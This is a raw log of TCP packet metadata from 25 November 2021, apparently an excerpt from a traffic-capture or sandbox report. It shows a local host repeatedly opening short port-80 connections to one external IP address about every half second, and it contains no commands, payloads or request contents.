Nov 25, 2021 10:48:38.038376093 CET	49893	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.071573973 CET	80	49893	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.094413042 CET	80	49893	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.094430923 CET	80	49893	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.094647884 CET	49893	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.094697952 CET	49893	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.127866983 CET	80	49893	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.537353992 CET	49894	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.570765018 CET	80	49894	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.570918083 CET	49894	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.572494984 CET	49894	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.605777979 CET	80	49894	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.605989933 CET	49894	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.639290094 CET	80	49894	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.655184984 CET	80	49894	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.655240059 CET	80	49894	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.655551910 CET	49894	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.655636072 CET	49894	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.689299107 CET	80	49894	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.139873981 CET	49895	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.173737049 CET	80	49895	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.173950911 CET	49895	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.175559044 CET	49895	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.209671021 CET	80	49895	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.209995985 CET	49895	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.244266987 CET	80	49895	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.260907888 CET	80	49895	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.260979891 CET	80	49895	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.261164904 CET	49895	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.261236906 CET	49895	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.295437098 CET	80	49895	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.725171089 CET	49896	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.759496927 CET	80	49896	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.759779930 CET	49896	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.761326075 CET	49896	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.795389891 CET	80	49896	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.795603037 CET	49896	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.829731941 CET	80	49896	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.845088005 CET	80	49896	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.845146894 CET	80	49896	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:39.845243931 CET	49896	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.845310926 CET	49896	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:39.879570961 CET	80	49896	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.183767080 CET	49897	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.216986895 CET	80	49897	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.217191935 CET	49897	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.218861103 CET	49897	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.252013922 CET	80	49897	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.252240896 CET	49897	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.285410881 CET	80	49897	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.303121090 CET	80	49897	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.303137064 CET	80	49897	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.303314924 CET	49897	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.303364992 CET	49897	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.336633921 CET	80	49897	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.745327950 CET	49898	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.778709888 CET	80	49898	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.778975964 CET	49898	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.780535936 CET	49898	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.813761950 CET	80	49898	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.813941002 CET	49898	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.847044945 CET	80	49898	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.863092899 CET	80	49898	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.863101959 CET	80	49898	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:40.863254070 CET	49898	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.863264084 CET	49898	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:40.896368980 CET	80	49898	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:41.338466883 CET	49899	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:41.371700048 CET	80	49899	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:41.371974945 CET	49899	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:41.373512030 CET	49899	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:41.406780958 CET	80	49899	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:41.406961918 CET	49899	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:41.440329075 CET	80	49899	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:41.457207918 CET	80	49899	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:41.457263947 CET	80	49899	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:41.457531929 CET	49899	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:41.457614899 CET	49899	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:41.491128922 CET	80	49899	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:41.933109999 CET	49900	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:41.966480970 CET	80	49900	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:41.966629028 CET	49900	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:41.968153000 CET	49900	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.001471043 CET	80	49900	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.001996994 CET	49900	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.035346985 CET	80	49900	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.053039074 CET	80	49900	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.053087950 CET	80	49900	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.053266048 CET	49900	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.053313017 CET	49900	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.086859941 CET	80	49900	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.499984980 CET	49901	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.534229994 CET	80	49901	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.534518003 CET	49901	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.536148071 CET	49901	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.570153952 CET	80	49901	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.570441961 CET	49901	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.604355097 CET	80	49901	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.619992971 CET	80	49901	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.620064020 CET	80	49901	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:42.620173931 CET	49901	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.620306015 CET	49901	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:42.654158115 CET	80	49901	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.077066898 CET	49902	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.110306978 CET	80	49902	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.110618114 CET	49902	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.112375975 CET	49902	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.145519972 CET	80	49902	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.145714045 CET	49902	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.178873062 CET	80	49902	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.198436975 CET	80	49902	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.198462009 CET	80	49902	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.198626041 CET	49902	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.198649883 CET	49902	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.231950045 CET	80	49902	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.610865116 CET	49903	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.644161940 CET	80	49903	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.644330978 CET	49903	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.645826101 CET	49903	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.679122925 CET	80	49903	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.679338932 CET	49903	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.712554932 CET	80	49903	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.728280067 CET	80	49903	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.728367090 CET	80	49903	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:43.728507996 CET	49903	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.728539944 CET	49903	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:43.761698008 CET	80	49903	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.165739059 CET	49904	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.199871063 CET	80	49904	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.200179100 CET	49904	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.201690912 CET	49904	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.235640049 CET	80	49904	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.235889912 CET	49904	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.269870996 CET	80	49904	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.288614988 CET	80	49904	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.288664103 CET	80	49904	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.288949013 CET	49904	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.289009094 CET	49904	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.324256897 CET	80	49904	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.776297092 CET	49905	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.809748888 CET	80	49905	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.809995890 CET	49905	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.811528921 CET	49905	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.844805002 CET	80	49905	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.845005035 CET	49905	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.878190994 CET	80	49905	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.900487900 CET	80	49905	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.900537014 CET	80	49905	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:44.900723934 CET	49905	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.900773048 CET	49905	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:44.934196949 CET	80	49905	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:45.356765032 CET	49906	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:45.390295029 CET	80	49906	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:45.390516043 CET	49906	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:45.392079115 CET	49906	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:45.425354958 CET	80	49906	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:45.425666094 CET	49906	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:45.459023952 CET	80	49906	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:45.483957052 CET	80	49906	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:45.484011889 CET	80	49906	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:45.484303951 CET	49906	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:45.484386921 CET	49906	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:45.518285036 CET	80	49906	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:45.953488111 CET	49907	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:45.987245083 CET	80	49907	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:45.987524033 CET	49907	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:45.989299059 CET	49907	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.023099899 CET	80	49907	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.023303032 CET	49907	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.057143927 CET	80	49907	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.079950094 CET	80	49907	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.079998016 CET	80	49907	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.080560923 CET	49907	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.080621004 CET	49907	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.114819050 CET	80	49907	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.491760015 CET	49908	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.525860071 CET	80	49908	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.526035070 CET	49908	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.527621031 CET	49908	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.561657906 CET	80	49908	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.561898947 CET	49908	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.595916033 CET	80	49908	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.613563061 CET	80	49908	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.613637924 CET	80	49908	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:46.613794088 CET	49908	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.613845110 CET	49908	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:46.647885084 CET	80	49908	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.072154999 CET	49909	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.105921984 CET	80	49909	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.106339931 CET	49909	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.107852936 CET	49909	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.141649961 CET	80	49909	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.141951084 CET	49909	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.175770998 CET	80	49909	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.196496010 CET	80	49909	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.196543932 CET	80	49909	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.196759939 CET	49909	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.196809053 CET	49909	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.230899096 CET	80	49909	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.650748014 CET	49911	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.684103012 CET	80	49911	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.684221983 CET	49911	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.685832024 CET	49911	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.719150066 CET	80	49911	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.719325066 CET	49911	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.752824068 CET	80	49911	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.774413109 CET	80	49911	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.774466038 CET	80	49911	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:47.774650097 CET	49911	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.774702072 CET	49911	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:47.808115005 CET	80	49911	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.189608097 CET	49912	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.222887039 CET	80	49912	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.223172903 CET	49912	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.224669933 CET	49912	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.258514881 CET	80	49912	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.259001017 CET	49912	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.292380095 CET	80	49912	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.313889027 CET	80	49912	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.313925028 CET	80	49912	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.314177990 CET	49912	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.314234972 CET	49912	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.348129988 CET	80	49912	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.792273045 CET	49913	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.826051950 CET	80	49913	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.826410055 CET	49913	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.828094006 CET	49913	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.861885071 CET	80	49913	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.862154007 CET	49913	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.896058083 CET	80	49913	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.914376974 CET	80	49913	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.914423943 CET	80	49913	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:48.914608955 CET	49913	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.914639950 CET	49913	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:48.948743105 CET	80	49913	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:49.323915005 CET	49914	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:49.357676029 CET	80	49914	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:49.358061075 CET	49914	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:49.359585047 CET	49914	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:49.393295050 CET	80	49914	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:49.393876076 CET	49914	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:49.427577972 CET	80	49914	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:49.444181919 CET	80	49914	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:49.444227934 CET	80	49914	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:49.444437027 CET	49914	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:49.444489956 CET	49914	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:49.478566885 CET	80	49914	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:49.901225090 CET	49915	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:49.934698105 CET	80	49915	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:49.934889078 CET	49915	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:49.936381102 CET	49915	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:49.969755888 CET	80	49915	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:49.969984055 CET	49915	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:50.003520012 CET	80	49915	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.019953012 CET	80	49915	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.020013094 CET	80	49915	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.020195961 CET	49915	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:50.020248890 CET	49915	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:50.053916931 CET	80	49915	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.461394072 CET	49916	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:50.495244980 CET	80	49916	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.495404959 CET	49916	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:50.496916056 CET	49916	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:50.530765057 CET	80	49916	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.530992031 CET	49916	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:50.564821005 CET	80	49916	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.589412928 CET	80	49916	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.589436054 CET	80	49916	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.589616060 CET	49916	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:50.589637995 CET	49916	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:50.623512030 CET	80	49916	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:50.984364986 CET	49917	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.017940998 CET	80	49917	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.018232107 CET	49917	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.019889116 CET	49917	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.053210020 CET	80	49917	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.053482056 CET	49917	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.087050915 CET	80	49917	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.106699944 CET	80	49917	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.106749058 CET	80	49917	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.106914043 CET	49917	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.106964111 CET	49917	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.140487909 CET	80	49917	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.532079935 CET	49918	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.565514088 CET	80	49918	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.565764904 CET	49918	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.567286015 CET	49918	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.600707054 CET	80	49918	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.600946903 CET	49918	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.634464025 CET	80	49918	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.650368929 CET	80	49918	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.650427103 CET	80	49918	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:51.650629997 CET	49918	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.650921106 CET	49918	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:51.684005976 CET	80	49918	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.076752901 CET	49919	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.109921932 CET	80	49919	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.110140085 CET	49919	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.111717939 CET	49919	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.144817114 CET	80	49919	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.145091057 CET	49919	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.178167105 CET	80	49919	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.198276997 CET	80	49919	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.198389053 CET	80	49919	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.198523045 CET	49919	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.198533058 CET	49919	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.231549025 CET	80	49919	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.609251022 CET	49920	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.642668962 CET	80	49920	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.642950058 CET	49920	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.644465923 CET	49920	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.677762032 CET	80	49920	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.677970886 CET	49920	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.711394072 CET	80	49920	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.727838993 CET	80	49920	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.727915049 CET	80	49920	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:52.728224039 CET	49920	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.728286028 CET	49920	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:52.761749983 CET	80	49920	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.208368063 CET	49921	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.242486954 CET	80	49921	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.242819071 CET	49921	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.244343996 CET	49921	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.278342962 CET	80	49921	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.278525114 CET	49921	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.312536955 CET	80	49921	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.329240084 CET	80	49921	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.329315901 CET	80	49921	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.329480886 CET	49921	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.329551935 CET	49921	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.363913059 CET	80	49921	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.782104015 CET	49922	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.816287994 CET	80	49922	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.816489935 CET	49922	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.818084002 CET	49922	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.852078915 CET	80	49922	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.852293015 CET	49922	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.886431932 CET	80	49922	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.902612925 CET	80	49922	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:53.902664900 CET	80	49922	176.223.209.128	192.168.11.20
